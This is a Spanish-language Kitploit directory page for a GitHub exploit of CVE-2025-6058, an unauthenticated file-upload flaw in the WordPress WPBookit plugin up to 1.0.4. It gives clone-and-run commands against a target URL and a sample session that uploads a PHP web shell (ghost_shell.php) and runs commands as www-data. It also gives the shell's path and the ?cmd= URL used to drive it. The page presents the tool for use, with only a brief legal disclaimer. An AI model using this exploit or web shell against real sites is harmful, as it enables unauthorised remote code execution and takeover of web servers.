Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 Exploit de subida de archivos sin autenticación | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2025-6058
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHub0xgh057r3c0n/cve-2025-6058

CVE-2025-6058

WordPress WPBookit ≤ 1.0.4 Exploit de subida de archivos sin autenticación

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Logotipo de WordPress

🚨 CVE-2025-6058 — Exploit de Carga de Archivos No Autenticado en WordPress WPBookit ≤ 1.0.4

Exploit de Carga Arbitraria de Archivos No Autenticado dirigido al Plugin WPBookit de WordPress (≤ 1.0.4)
El exploit permite la carga remota de shell y la ejecución completa de comandos.

Autor: 0xgh057r3c0n


📌 Acerca de la Vulnerabilidad

CVE-2025-6058 es una vulnerabilidad crítica que afecta al plugin WPBookit en WordPress CMS. Un atacante no autenticado puede abusar de un endpoint AJAX vulnerable para cargar archivos PHP arbitrarios, permitiendo Ejecución Remota de Código (RCE).

  • 🎯 Objetivo: WordPress CMS (plugin WPBookit vulnerable)
  • 📦 Plugin Afectado: WPBookit ≤ 1.0.4
  • ⚠️ Nivel de Riesgo: Crítico (RCE no autenticado)

✨ Características

  • 🔍 Detecta automáticamente la versión del plugin de WordPress mediante README.txt
  • 📤 Carga una shell PHP ligera (ghost_shell.php)
  • 🖥️ Shell interactiva (prompt estilo Parrot)
  • 🌐 No autenticado — No requiere inicio de sesión
  • 🎨 Salida CLI coloreada

🚀 Guía de Uso

💻 Requisitos

root@kitploit:~
python3 --version
pip install requests

⚙️ Ejecución del Exploit

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com

🛠️ Ejemplo de Sesión de Shell

root@kitploit:~
python3 CVE-2025-6058.py -u https://victim.com

[>] Checking plugin version...
[+] Found plugin version: 1.0.4
[!] Target version is vulnerable.

[>] Uploading shell...
[+] Upload successful.
[+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

[!] Interactive GhostShell Started — type 'exit' to quit.

┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data

📂 Detalles de la Shell

  • Nombre del Archivo: ghost_shell.php
  • Ruta: /wp-content/uploads/YYYY/MM/ghost_shell.php
  • Ejemplo:
root@kitploit:~
https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

⚠️ Aviso Legal

Este exploit ha sido desarrollado con fines educativos y únicamente para pruebas de penetración autorizadas. El uso no autorizado contra sistemas sin consentimiento explícito es ilegal.


📄 Licencia

Publicado bajo Licencia MIT


Hecho para auditoría de seguridad de WordPress 🛡️ por 0xgh057r3c0n

Descargar herramienta